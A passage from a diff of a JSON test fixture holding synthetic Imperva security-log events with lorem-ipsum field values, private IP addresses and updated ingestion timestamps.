08:13:24,updateTime=oremip,alertSev=low,group=odit,ruleName=\"vol\",evntDesc=\"epteurs\",category=itse,disposition=rever,eventType=sBonoru,proto=udp,srcPort=2652,srcIP=10.60.164.100,dstPort=5119,dstIP=10.1.193.187,policyName=\"yCice\",occurrences=508,httpHost=ionem,webMethod=taevitae,url=\"https://api.example.net/quam/saute.htm?nostru=docons#emipsumq\",webQuery=\"orinr\",soapAction=ineavol,resultCode=umdo,sessionID=tass,username=ugi,addUsername=riat,responseTime=atvol,responseSize=emipsum,direction=internal,dbUsername=uameiu,queryGroup=quiado,application=\"conse\",srcHost=mips3283.corp,osUsername=hite,schemaName=adipis,dbName=abo,hdrName=suntex,action=\"allow\",errormsg=\"failure\"", "event": { - "ingested": "2021-06-09T11:17:04.825974Z" + "ingested": "2021-12-14T14:46:55.618565374Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.248.244.203,dstPort=806,dbUsername=mquamei,srcIP=10.146.228.234,srcPort=4346,creatTime=2017-12-29 15:15:58,srvGroup=rissusci,service=uaturQ,appName=iusmod,event#=susc,eventType=taed,usrGroup=eatae,usrAuth=siutali,application=\"oloremq\",osUsername=sum,srcHost=aliquip7229.mail.domain,dbName=doe,schemaName=eiusm,bindVar=oremipsu,sqlError=failure,respSize=3058,respTime=133.358000,affRows=llum,action=\"allow\",rawQuery=\"mto\"", "event": { - "ingested": "2021-06-09T11:17:04.825977900Z" + "ingested": "2021-12-14T14:46:55.618565831Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.122.127.237,dstPort=1138,dbUsername=consecte,srcIP=10.86.121.152,srcPort=3971,creatTime=2018-01-12 22:18:32,srvGroup=mquamei,service=litesse,appName=fug,event#=liquid,eventType=Logout,usrGroup=uidex,usrAuth=False,application=\"umdolo\",osUsername=nimv,srcHost=fde7756.mail.corp,dbName=usmod,schemaName=ine,bindVar=qui,sqlError=success,respSize=2771,respTime=136.167000,affRows=orsitame,action=\"block\",rawQuery=\"ipex\"", "event": { - "ingested": "2021-06-09T11:17:04.825981800Z" + "ingested": "2021-12-14T14:46:55.618566323Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.201.223.119,dstPort=3614,dbUsername=rcit,srcIP=10.204.223.184,srcPort=6092,creatTime=2018-01-27 05:21:06,srvGroup=giat,service=nculpa,appName=olupt,event#=tvol,eventType=Logout,usrGroup=ostru,usrAuth=True,application=\"mea\",osUsername=tuserror,srcHost=agnama5013.internal.example,dbName=boreetdo,schemaName=teni,bindVar=iin,sqlError=unknown,respSize=4113,respTime=161.837000,affRows=tNeq,action=\"block\",rawQuery=\"liq\"", "event": { - "ingested": "2021-06-09T11:17:04.825985700Z" + "ingested": "2021-12-14T14:46:55.618566713Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.200.12.126,dstPort=2347,dbUsername=magnido,srcIP=10.223.56.33,srcPort=5899,creatTime=10 February 2018 12:23:41,srvGroup=ing,service=amal,appName=aliq,event#=utem,eventType=Login,usrGroup=oreetd,usrAuth=True,application=\"itatis\",osUsername=Nequepo,srcHost=edictas4693.home,dbName=borisnis,schemaName=elitsedd,bindVar=hitecto,sqlError=failure,respSize=3243,respTime=75.415000,affRows=imven,action=\"block\",rawQuery=\"hende\"", "event": { - "ingested": "2021-06-09T11:17:04.825989700Z" + "ingested": "2021-12-14T14:46:55.618567111Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,alert#=deseru,event#=aquioff,createTime=2018-02-24 19:26:15,updateTime=cip,alertSev=very-high,group=onsequat,ruleName=\"tiumd\",evntDesc=\"atuse\",category=imad,disposition=tura,eventType=equuntur,proto=ipv6,srcPort=428,srcIP=10.94.89.177,dstPort=1752,dstIP=10.65.225.101,policyName=\"nulapari\",occurrences=2513,httpHost=ostrumex,webMethod=eruntmol,url=\"https://internal.example.com/imide/uiineav.htm?lloinve=eni#asia\",webQuery=\"edquiac\",soapAction=psamvolu,resultCode=teturad,sessionID=ritq,username=tuserror,addUsername=tla,responseTime=orroq,responseSize=modtempo,direction=outbound,dbUsername=uptate,queryGroup=sumqui,application=\"eritin\",srcHost=nibu2565.api.local,osUsername=citation,schemaName=emquel,dbName=rspiciat,hdrName=iavol,action=\"cancel\",errormsg=\"unknown\"", "event": { - "ingested": "2021-06-09T11:17:04.825993400Z" + "ingested": "2021-12-14T14:46:55.618567508Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.65.174.196,dstPort=472,dbUsername=iin,srcIP=10.191.184.105,srcPort=6821,creatTime=2018-03-11 02:28:49,srvGroup=iat,service=orain,appName=equaturQ,event#=llu,eventType=quaUt,usrGroup=labor,usrAuth=oris,application=\"tatemse\",osUsername=uta,srcHost=tsun7120.home,dbName=per,schemaName=tione,bindVar=nibus,sqlError=unknown,respSize=5836,respTime=61.864000,affRows=olo,action=\"deny\",rawQuery=\"BCSedutp\"", "event": { - "ingested": "2021-06-09T11:17:04.825997200Z" + "ingested": "2021-12-14T14:46:55.618567957Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,alert#=tdolor,event#=Ute,createTime=2018-03-25 09:31:24,updateTime=tura,alertSev=very-high,group=umSecti,ruleName=\"eabil\",evntDesc=\"ibusB\",category=rporis,disposition=etco,eventType=mip,proto=rdp,srcPort=6078,srcIP=10.224.148.48,dstPort=2803,dstIP=10.41.181.179,policyName=\"siarch\",occurrences=7468,httpHost=setq,webMethod=rumwr,url=\"https://api.example.com/ptatem/mporain.gif?corpo=commod#iumd\",webQuery=\"ntore\",soapAction=tect,resultCode=ion,sessionID=tutl,username=niam,addUsername=oru,responseTime=mcorp,responseSize=uelaud,direction=outbound,dbUsername=ameiu,queryGroup=utei,application=\"caecat\",srcHost=lumquid6940.mail.localdomain,osUsername=equepor,schemaName=iosamn,dbName=erspicia,hdrName=neavolup,action=\"deny\",errormsg=\"success\"", "event": { - "ingested": "2021-06-09T11:17:04.826001400Z" + "ingested": "2021-12-14T14:46:55.618568344Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.21.208.103,dstPort=5543,dbUsername=imidest,srcIP=10.21.61.134,srcPort=6124,creatTime=2018-04-08 16:33:58,srvGroup=iacon,service=ncu,appName=quaturve,event#=ciad,eventType=Logout,usrGroup=diconseq,usrAuth=False,application=\"utod\",osUsername=ostr,srcHost=amcorp7299.api.example,dbName=uptatem,schemaName=mipsa,bindVar=nproide,sqlError=success,respSize=7766,respTime=91.186000,affRows=siutali,action=\"deny\",rawQuery=\"nemullam\"", "event": { - "ingested": "2021-06-09T11:17:04.826022800Z" + "ingested": "2021-12-14T14:46:55.618568734Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.23.6.216,dstPort=4578,dbUsername=iarchit,srcIP=10.221.192.116,srcPort=4688,creatTime=2018-04-22 23:36:32,srvGroup=usBonor,service=mide,appName=sten,event#=enderi,eventType=Logout,usrGroup=labore,usrAuth=False,application=\"uasiarch\",osUsername=iamquisn,srcHost=magnama868.api.local,dbName=Section,schemaName=tevelite,bindVar=esciunt,sqlError=success,respSize=639,respTime=6.388000,affRows=borisnis,action=\"accept\",rawQuery=\"oremagn\"", "event": { - "ingested": "2021-06-09T11:17:04.826030800Z" + "ingested": "2021-12-14T14:46:55.618569122Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,alert#=rcita,event#=ataev,createTime=2018-05-07 06:39:06,updateTime=oris,alertSev=very-high,group=tate,ruleName=\"tutlabo\",evntDesc=\"nto\",category=sciv,disposition=tlabo,eventType=nsequun,proto=ipv6,srcPort=2976,srcIP=10.191.142.143,dstPort=5850,dstIP=10.240.62.238,policyName=\"sintoc\",occurrences=7580,httpHost=laboris,webMethod=ali,url=\"https://www5.example.net/aUten/edutpers.gif?apariatu=mnisis#onsequa\",webQuery=\"sunt\",soapAction=orumSe,resultCode=olupta,sessionID=emveleum,username=modtempo,addUsername=mfugi,responseTime=roqui,responseSize=ntutlabo,direction=external,dbUsername=isq,queryGroup=eacommo,application=\"amqua\",srcHost=tionevol3157.mail.invalid,osUsername=nofde,schemaName=animide,dbName=Lore,hdrName=oin,action=cancel", "event": { - "ingested": "2021-06-09T11:17:04.826036400Z" + "ingested": "2021-12-14T14:46:55.618569527Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,alert#=ecatcu,event#=entoreve,createTime=2018-05-21 13:41:41,updateTime=ion,alertSev=very-high,group=onev,ruleName=\"atu\",evntDesc=\"adeseru\",category=sitas,disposition=eni,eventType=cte,proto=igmp,srcPort=3124,srcIP=10.178.79.217,dstPort=7499,dstIP=10.111.22.134,policyName=\"datatno\",occurrences=3538,httpHost=siar,webMethod=orisnis,url=\"https://www.example.net/mvolup/pidat.jpg?ents=nsec#iaeco\",webQuery=\"ommodoco\",soapAction=ritinv,resultCode=rita,sessionID=oidents,username=ccusan,addUsername=inimav,responseTime=quel,responseSize=ugitsed,direction=external,dbUsername=idolor,queryGroup=xplic,application=\"stenat\",srcHost=mquis319.api.local,osUsername=inibusBo,schemaName=tqui,dbName=sequun,hdrName=nimadm,action=deny", "event": { - "ingested": "2021-06-09T11:17:04.826040800Z" + "ingested": "2021-12-14T14:46:55.618569976Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.161.225.172,dstPort=3708,dbUsername=meaqu,srcIP=10.77.86.215,srcPort=6390,creatTime=4 June 2018 20:44:15,srvGroup=con,service=aeabil,appName=iumtot,event#=edicta,eventType=Login,usrGroup=itaspern,usrAuth=False,application=\"tau\",osUsername=rcit,srcHost=urad5712.api.host,dbName=sitamet,schemaName=xerc,bindVar=mcolabor,sqlError=success,respSize=7286,respTime=143.926000,affRows=evita,action=\"block\",rawQuery=\"ant\"", "event": { - "ingested": "2021-06-09T11:17:04.826045100Z" + "ingested": "2021-12-14T14:46:55.618570383Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.186.133.184,dstPort=7864,dbUsername=boriosa,srcIP=10.211.161.187,srcPort=843,creatTime=2018-06-19 03:46:49,srvGroup=laud,service=uido,appName=uis,event#=msequin,eventType=autem,usrGroup=mporai,usrAuth=ipi,application=\"qua\",osUsername=acons,srcHost=enbyCic4659.www5.example,dbName=orroqui,schemaName=sci,bindVar=psamvolu,sqlError=unknown,respSize=1578,respTime=66.164000,affRows=temse,action=\"deny\",rawQuery=\"onevol\"", "event": { - "ingested": "2021-06-09T11:17:04.826049200Z" + "ingested": "2021-12-14T14:46:55.618570809Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.160.147.230,dstPort=2126,dbUsername=nimvenia,srcIP=10.254.198.47,srcPort=3925,creatTime=2018-07-03 10:49:23,srvGroup=lit,service=quin,appName=adipisc,event#=sedqui,eventType=ueporroq,usrGroup=dolo,usrAuth=adm,application=\"dolor\",osUsername=ndeomnis,srcHost=inBCSed5308.api.corp,dbName=modicons,schemaName=illoin,bindVar=rinre,sqlError=unknown,respSize=5988,respTime=34.664000,affRows=olorem,action=\"cancel\",rawQuery=\"dquiaco\"", "event": { - "ingested": "2021-06-09T11:17:04.826052900Z" + "ingested": "2021-12-14T14:46:55.618571201Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.40.24.93,dstPort=7487,dbUsername=mSecti,srcIP=10.182.197.243,srcPort=3687,creatTime=2018-07-17 17:51:58,srvGroup=xerci,service=qua,appName=iaecons,event#=pteurs,eventType=Logout,usrGroup=intocc,usrAuth=True,application=\"abo\",osUsername=orisnis,srcHost=reseo2067.api.localdomain,dbName=nsectetu,schemaName=exerci,bindVar=lit,sqlError=success,respSize=4129,respTime=171.277000,affRows=ono,action=\"cancel\",rawQuery=\"equuntu\"", "event": { - "ingested": "2021-06-09T11:17:04.826056600Z" + "ingested": "2021-12-14T14:46:55.618571658Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.249.13.159,dstPort=3023,dbUsername=uisautei,srcIP=10.108.130.106,srcPort=7601,creatTime=1 August 2018 00:54:32,srvGroup=scinge,service=lum,appName=iinea,event#=xercit,eventType=Login,usrGroup=reh,usrAuth=False,application=\"velitess\",osUsername=colab,srcHost=itte6905.mail.invalid,dbName=tesseq,schemaName=exeacomm,bindVar=uptat,sqlError=success,respSize=1044,respTime=112.679000,affRows=ptatema,action=\"cancel\",rawQuery=\"cepteurs\"", "event": { - "ingested": "2021-06-09T11:17:04.826060400Z" + "ingested": "2021-12-14T14:46:55.618572053Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,alert#=ioffic,event#=rumetMal,createTime=2018-08-15 07:57:06,updateTime=tiumtot,alertSev=very-high,group=caboNe,ruleName=\"ptate\",evntDesc=\"enimips\",category=Nequepor,disposition=nisiu,eventType=ptat,proto=ggp,srcPort=4082,srcIP=10.64.94.174,dstPort=3852,dstIP=10.39.244.49,policyName=\"ctas\",occurrences=7128,httpHost=sequ,webMethod=gna,url=\"https://internal.example.org/aev/uovolup.txt?aqueip=aqueip#rautod\",webQuery=\"tur\",soapAction=minimav,resultCode=uovo,sessionID=aven,username=Sedut,addUsername=stiaec,responseTime=rveli,responseSize=serr,direction=internal,dbUsername=uid,queryGroup=lamcor,application=\"rorsitv\",srcHost=caboNemo274.www.host,osUsername=estiae,schemaName=iunt,dbName=eFinibu,hdrName=uisaut,action=cancel", "event": { - "ingested": "2021-06-09T11:17:04.826064300Z" + "ingested": "2021-12-14T14:46:55.618572440Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,event#=odit,createTime=2018-08-29 14:59:40,eventType=ercitati,eventSev=very-high,username=imad,subsystem=olo,message=\"deserun\"", "event": { - "ingested": "2021-06-09T11:17:04.826068200Z" + "ingested": "2021-12-14T14:46:55.618572828Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,event#=scingeli,createTime=2018-09-12 22:02:15,eventType=uatDuis,eventSev=medium,username=apari,subsystem=itesseci,message=\"utali\"", "event": { - "ingested": "2021-06-09T11:17:04.826071900Z" + "ingested": "2021-12-14T14:46:55.618573221Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.115.203.143,dstPort=6889,dbUsername=utoditau,srcIP=10.134.135.22,srcPort=1809,creatTime=27 September 2018 05:04:49,srvGroup=serror,service=itl,appName=Bonoru,event#=rumetMa,eventType=Login,usrGroup=entor,usrAuth=False,application=\"urere\",osUsername=involu,srcHost=qui5978.api.test,dbName=amre,schemaName=orpori,bindVar=sistena,sqlError=failure,respSize=7868,respTime=5.277000,affRows=borisn,action=\"cancel\",rawQuery=\"quatu\"", "event": { - "ingested": "2021-06-09T11:17:04.826075500Z" + "ingested": "2021-12-14T14:46:55.618573664Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.43.244.252,dstPort=1752,dbUsername=inculp,srcIP=10.251.212.166,srcPort=3925,creatTime=11 October 2018 12:07:23,srvGroup=iur,service=aboNemo,appName=tsedquia,event#=ididun,eventType=Login,usrGroup=tatiset,usrAuth=False,application=\"enim\",osUsername=gnido,srcHost=iamq2577.internal.corp,dbName=uisa,schemaName=uptat,bindVar=siutal,sqlError=unknown,respSize=6947,respTime=144.976000,affRows=tempori,action=\"accept\",rawQuery=\"lamco\"", "event": { - "ingested": "2021-06-09T11:17:04.826079300Z" + "ingested": "2021-12-14T14:46:55.618574076Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,event#=nimve,createTime=2018-10-25 19:09:57,eventType=edutpe,eventSev=medium,username=isunde,subsystem=nimadm,message=\"cepte\"", "event": { - "ingested": "2021-06-09T11:17:04.826083300Z" + "ingested": "2021-12-14T14:46:55.618575831Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.20.231.188,dstPort=1200,dbUsername=tesseq,srcIP=10.88.189.164,srcPort=1373,creatTime=2018-11-09 02:12:32,srvGroup=iusmod,service=aincid,appName=giatq,event#=tion,eventType=Logout,usrGroup=tNeque,usrAuth=False,application=\"uidolore\",osUsername=uatDuisa,srcHost=usB4127.localhost,dbName=ufugia,schemaName=mqu,bindVar=remagna,sqlError=failure,respSize=1623,respTime=33.468000,affRows=Uteni,action=\"cancel\",rawQuery=\"porinci\"", "event": { - "ingested": "2021-06-09T11:17:04.826088500Z" + "ingested": "2021-12-14T14:46:55.618576221Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,event#=edd,createTime=2018-11-23 09:15:06,eventType=uianon,eventSev=low,username=quamquae,subsystem=aaliq,message=\"nos\"", "event": { - "ingested": "2021-06-09T11:17:04.826092200Z" + "ingested": "2021-12-14T14:46:55.618576599Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.231.77.26,dstPort=7082,dbUsername=rehe,srcIP=10.225.11.197,srcPort=3513,creatTime=7 December 2018 16:17:40,srvGroup=siarchi,service=seddoeiu,appName=lorinrep,event#=isq,eventType=Login,usrGroup=quines,usrAuth=False,application=\"entsu\",osUsername=ineavol,srcHost=abor3266.mail.home,dbName=voluptat,schemaName=volu,bindVar=iutaliqu,sqlError=failure,respSize=3064,respTime=61.960000,affRows=iusmo,action=\"allow\",rawQuery=\"uovo\"", "event": { - "ingested": "2021-06-09T11:17:04.826096200Z" + "ingested": "2021-12-14T14:46:55.618577253Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.148.3.197,dstPort=979,dbUsername=usa,srcIP=10.106.166.105,srcPort=4567,creatTime=2018-12-21 23:20:14,srvGroup=oremagna,service=siuta,appName=amnihil,event#=nderit,eventType=ficia,usrGroup=tru,usrAuth=tionu,application=\"natuser\",osUsername=olupt,srcHost=eprehe2455.www.home,dbName=smo,schemaName=avolup,bindVar=litse,sqlError=failure,respSize=2658,respTime=84.894000,affRows=untutlab,action=\"allow\",rawQuery=\"byCicer\"", "event": { - "ingested": "2021-06-09T11:17:04.826100100Z" + "ingested": "2021-12-14T14:46:55.618577762Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.172.121.239,dstPort=5339,dbUsername=iuta,srcIP=10.57.169.205,srcPort=3093,creatTime=2019-01-05 06:22:49,srvGroup=reeufugi,service=oloree,appName=xeaco,event#=urm,eventType=Logout,usrGroup=mpo,usrAuth=False,application=\"cept\",osUsername=ctas,srcHost=destla2110.www5.localdomain,dbName=inea,schemaName=ipsu,bindVar=iden,sqlError=failure,respSize=392,respTime=19.061000,affRows=reetd,action=\"cancel\",rawQuery=\"maven\"", "event": { - "ingested": "2021-06-09T11:17:04.826104Z" + "ingested": "2021-12-14T14:46:55.618578154Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.129.234.200,dstPort=3833,dbUsername=tisundeo,srcIP=10.42.218.103,srcPort=3315,creatTime=19 January 2019 13:25:23,srvGroup=mnis,service=tametco,appName=snisiut,event#=lit,eventType=Login,usrGroup=laborio,usrAuth=False,application=\"aaliqu\",osUsername=tevelit,srcHost=exerc3694.api.home,dbName=consec,schemaName=dquia,bindVar=cep,sqlError=success,respSize=6709,respTime=34.273000,affRows=volupta,action=\"allow\",rawQuery=\"ipex\"", "event": { - "ingested": "2021-06-09T11:17:04.826107800Z" + "ingested": "2021-12-14T14:46:55.618578537Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.111.132.221,dstPort=2262,dbUsername=ali,srcIP=10.76.121.224,srcPort=4305,creatTime=2019-02-02 20:27:57,srvGroup=xcep,service=ehen,appName=remap,event#=mUt,eventType=Logout,usrGroup=admi,usrAuth=True,application=\"siarch\",osUsername=oloremi,srcHost=ididu5928.www5.local,dbName=tNe,schemaName=scive,bindVar=tcupi,sqlError=unknown,respSize=6155,respTime=139.491000,affRows=Sed,action=\"cancel\",rawQuery=\"ita\"", "event": { - "ingested": "2021-06-09T11:17:04.826111400Z" + "ingested": "2021-12-14T14:46:55.618579183Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.195.8.141,dstPort=4342,dbUsername=enimip,srcIP=10.17.214.21,srcPort=4821,creatTime=17 February 2019 03:30:32,srvGroup=umquiado,service=taspe,appName=empori,event#=mipsum,eventType=Login,usrGroup=tium,usrAuth=True,application=\"riaturE\",osUsername=ota,srcHost=boriosa7066.www.corp,dbName=Nequep,schemaName=dolo,bindVar=exeacom,sqlError=success,respSize=469,respTime=146.775000,affRows=eufugiat,action=\"accept\",rawQuery=\"non\"", "event": { - "ingested": "2021-06-09T11:17:04.826130400Z" + "ingested": "2021-12-14T14:46:55.618579583Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.173.13.179,dstPort=1211,dbUsername=ptasn,srcIP=10.179.60.167,srcPort=1124,creatTime=2019-03-03 10:33:06,srvGroup=amqui,service=itatise,appName=utlab,event#=ostr,eventType=Logout,usrGroup=liqu,usrAuth=True,application=\"cons\",osUsername=apar,srcHost=ssusc1892.internal.host,dbName=xplic,schemaName=isn,bindVar=quepor,sqlError=failure,respSize=758,respTime=58.800000,affRows=etur,action=\"block\",rawQuery=\"cusan\"", "event": { - "ingested": "2021-06-09T11:17:04.826136900Z" + "ingested": "2021-12-14T14:46:55.618579973Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.42.135.34,dstPort=4361,dbUsername=tiset,srcIP=10.178.190.123,srcPort=3288,creatTime=2019-03-17 17:35:40,srvGroup=xercitat,service=ueporr,appName=utlab,event#=entoreve,eventType=Logout,usrGroup=lmolest,usrAuth=False,application=\"ser\",osUsername=ore,srcHost=iatisund424.mail.localdomain,dbName=tametcon,schemaName=orsi,bindVar=ull,sqlError=success,respSize=2290,respTime=1.468000,affRows=etdolore,action=\"cancel\",rawQuery=\"ore\"", "event": { - "ingested": "2021-06-09T11:17:04.826141600Z" + "ingested": "2021-12-14T14:46:55.618580375Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,event#=ectetur,createTime=2019-04-01 00:38:14,eventType=cons,eventSev=medium,username=fugit,subsystem=dantiu,message=\"ntutla\"", "event": { - "ingested": "2021-06-09T11:17:04.826146100Z" + "ingested": "2021-12-14T14:46:55.618580761Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.207.198.239,dstPort=4735,dbUsername=Loremips,srcIP=10.8.147.176,srcPort=5920,creatTime=15 April 2019 07:40:49,srvGroup=odtem,service=ite,appName=tseddo,event#=ptatems,eventType=Login,usrGroup=ori,usrAuth=False,application=\"exerc\",osUsername=aUteni,srcHost=uidolo7626.local,dbName=rchite,schemaName=incididu,bindVar=idolor,sqlError=failure,respSize=3043,respTime=36.712000,affRows=oinB,action=\"accept\",rawQuery=\"econsequ\"", "event": { - "ingested": "2021-06-09T11:17:04.826150100Z" + "ingested": "2021-12-14T14:46:55.618581233Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.116.26.185,dstPort=595,dbUsername=oNe,srcIP=10.206.221.180,srcPort=6818,creatTime=2019-04-29 14:43:23,srvGroup=repr,service=idu,appName=otam,event#=amquaera,eventType=rumS,usrGroup=uelau,usrAuth=quidolor,application=\"cca\",osUsername=litesseq,srcHost=dmini3435.internal.domain,dbName=rumexerc,schemaName=nseq,bindVar=quisnost,sqlError=unknown,respSize=3218,respTime=26.485000,affRows=orisnisi,action=\"block\",rawQuery=\"nul\"", "event": { - "ingested": "2021-06-09T11:17:04.826153900Z" + "ingested": "2021-12-14T14:46:55.618581621Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.86.180.150,dstPort=5495,dbUsername=mnisis,srcIP=10.253.127.130,srcPort=5339,creatTime=2019-05-13 21:45:57,srvGroup=isciveli,service=urve,appName=sundeomn,event#=tasu,eventType=Logout,usrGroup=equunt,usrAuth=True,application=\"uat\",osUsername=itasper,srcHost=nibusBo1864.domain,dbName=ent,schemaName=etconsec,bindVar=docons,sqlError=failure,respSize=4564,respTime=4.592000,affRows=mremap,action=\"allow\",rawQuery=\"sperna\"", "event": { - "ingested": "2021-06-09T11:17:04.826157600Z" + "ingested": "2021-12-14T14:46:55.618582010Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,alert#=mexe,event#=sequatDu,createTime=2019-05-28 04:48:31,updateTime=ssuscip,alertSev=high,group=ciade,ruleName=\"busBonor\",evntDesc=\"enima\",category=emseq,disposition=osamni,eventType=umetMa,proto=ipv6-icmp,srcPort=4469,srcIP=10.220.175.201,dstPort=579,dstIP=10.158.161.5,policyName=\"eab\",occurrences=4098,httpHost=ciduntut,webMethod=atisu,url=\"https://internal.example.com/architec/incul.txt?aborios=mco#amnisiu\",webQuery=\"suntincu\",soapAction=lore,resultCode=equatu,sessionID=enbyCi,username=dolo,addUsername=adipi,responseTime=beata,responseSize=evelites,direction=inbound,dbUsername=tNeq,queryGroup=umtot,application=\"eumiurer\",srcHost=inv6528.www5.example,osUsername=rrors,schemaName=dolo,dbName=tsed,hdrName=corpori,action=allow", "event": { - "ingested": "2021-06-09T11:17:04.826163200Z" + "ingested": "2021-12-14T14:46:55.618582394Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,event#=uioff,createTime=2019-06-11 11:51:06,eventType=ema,eventSev=low,username=mpo,subsystem=deritinv,message=\"ten\"", "event": { - "ingested": "2021-06-09T11:17:04.826167200Z" + "ingested": "2021-12-14T14:46:55.618582815Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.150.27.144,dstPort=5627,dbUsername=res,srcIP=10.248.16.82,srcPort=6834,creatTime=25 June 2019 